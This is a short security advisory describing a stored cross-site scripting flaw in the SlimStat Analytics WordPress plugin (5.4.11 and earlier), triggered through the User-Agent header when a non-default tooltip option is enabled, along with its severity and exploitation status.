The SlimStat Analytics plugin for WordPress contains a stored cross‑site scripting vulnerability that originates from the User‑Agent HTTP header. The flaw is caused by insufficient sanitization of the header value and a lack of output escaping when the ‘show_complete_user_agent_tooltip’ option is enabled. An unauthenticated attacker can send a specially crafted User‑Agent string containing malicious JavaScript; the value is stored in the database and later rendered in the reports interface where it executes in the victim’s browser. This allows the attacker to steal session cookies, deface the site, or conduct phishing attacks against any user who visits a page that loads the compromised content.

All instances of the SlimStat Analytics plugin from veronalabs, with a version of 5.4.11 or earlier, are vulnerable. The issue exists only when the plugin configuration option ‘show_complete_user_agent_tooltip’ is turned on, a setting that is disabled by default. The vulnerability is tied to the WordPress site where the plugin is installed and does not affect core WordPress code directly.

The CVSS base score of 7.2 indicates a high severity condition. Although an explicit EPSS score is not available, the absence of a CISA KEV listing suggests that this flaw has not yet been exploited widely. The attack relies on the victim visiting a page that renders the stored User‑Agent data while the special setting is enabled, meaning the attack scope is limited to users who browse the plugin’s report pages. An attacker can exploit the flaw by sending a malicious User‑Agent header; because the payload is stored, repeated exploitation is possible for any user who visits the affected page. The lack of a readily available exploit tool implies the attacker must craft their own request, but the mechanics are straightforward.